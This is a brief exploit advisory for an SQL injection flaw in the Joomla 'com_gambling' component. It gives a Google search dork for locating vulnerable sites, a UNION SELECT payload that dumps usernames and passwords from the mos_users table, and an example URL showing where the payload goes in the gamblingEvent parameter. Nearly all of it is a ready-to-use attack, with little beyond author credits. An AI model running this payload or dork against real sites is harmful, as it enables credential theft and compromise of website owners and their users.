#------------------In The Name Of God------------

Joomla (com_gambling) SQL Injection Vulnerabilities

###################################
#AUTHOR: md.r00t
#Mail: [email protected]
#Webstie: www.r00t.gigfa.com
#Forum: http://forum.aria-security.com

###################################
#Google D0rk:

inurl:"com_gambling"

###################################
#Exploit:
#---------

-9999+union+select+1,concat(username,0x3a,password)+from+mos_users/*

###################################
#Example:

#http://www.Site.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid=10&gamblingEvent=[Exploit]
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team